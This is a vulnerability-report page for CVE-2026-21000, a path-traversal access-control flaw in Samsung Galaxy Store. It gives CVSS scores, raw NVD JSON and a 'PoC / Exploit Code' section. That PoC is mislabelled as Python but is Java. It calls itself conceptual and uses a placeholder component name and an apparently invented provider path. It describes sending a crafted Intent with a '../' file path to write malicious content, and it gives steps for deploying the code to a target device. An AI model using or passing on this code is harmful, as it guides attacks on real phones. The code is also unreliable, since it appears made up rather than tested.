Security Vulnerability Report
中文
CVE-2026-21000 CVSS 5.5 MEDIUM

CVE-2026-21000

Published: 2026-03-16 14:18:11
Last Modified: 2026-04-07 00:36:26
Source: [email protected]

Description

Improper access control in Galaxy Store prior to version 4.6.03.8 allows local attacker to create file with Galaxy Store privilege.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:samsung:galaxy_store:*:*:*:*:*:*:*:* - VULNERABLE
Samsung Galaxy Store < 4.6.03.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-21000 PoC - Galaxy Store Privilege Escalation // This PoC demonstrates improper access control in Galaxy Store // Target: Samsung Galaxy Store < 4.6.03.8 // Note: This is a conceptual PoC for educational purposes only import android.content.Intent; import android.net.Uri; import android.os.Bundle; public class GalaxyStoreExploit { // Exploit the improper access control to create files with Galaxy Store privilege public void exploitGalaxyStore() { try { // Step 1: Identify vulnerable component in Galaxy Store // The vulnerability exists in how Galaxy Store handles file creation requests // Step 2: Craft malicious intent to trigger file creation Intent maliciousIntent = new Intent(); maliciousIntent.setComponent(new android.content.ComponentName( "com.sec.android.app.samsungapps", "com.sec.android.app.samsungapps.unkclass" )); // Step 3: Set up data URI pointing to target file location // This exploits the improper access control Uri targetUri = Uri.parse("content://com.sec.android.app.samsungapps.provider/file_creation"); maliciousIntent.setData(targetUri); // Step 4: Add extra data to specify file content and path Bundle extras = new Bundle(); extras.putString("file_path", "/data/data/com.sec.android.app.samsungapps/../attacked_file"); extras.putString("file_content", "malicious_content"); maliciousIntent.putExtras(extras); // Step 5: Launch the exploit // This will create a file with Galaxy Store privileges startActivity(maliciousIntent); } catch (Exception e) { e.printStackTrace(); } } // Verification method to check if file was created public boolean verifyExploit() { java.io.File createdFile = new java.io.File("/data/data/com.sec.android.app.samsungapps/attacked_file"); return createdFile.exists(); } } // Usage: // 1. Deploy this exploit to the target Samsung device // 2. Ensure the device has Galaxy Store < 4.6.03.8 installed // 3. Execute the exploit with local user privileges // 4. Verify file creation with elevated privileges

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21000", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:11.080", "lastModified": "2026-04-07T00:36:26.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in Galaxy Store prior to version 4.6.03.8 allows local attacker to create file with Galaxy Store privilege."}, {"lang": "es", "value": "Control de acceso inadecuado en Galaxy Store anterior a la versión 4.6.03.8 permite a un atacante local crear un archivo con privilegios de Galaxy Store."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:galaxy_store:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.03.8", "matchCriteriaId": "40D06C76-5232-4A91-B7A3-D3B64BCDBBA8"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=03", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.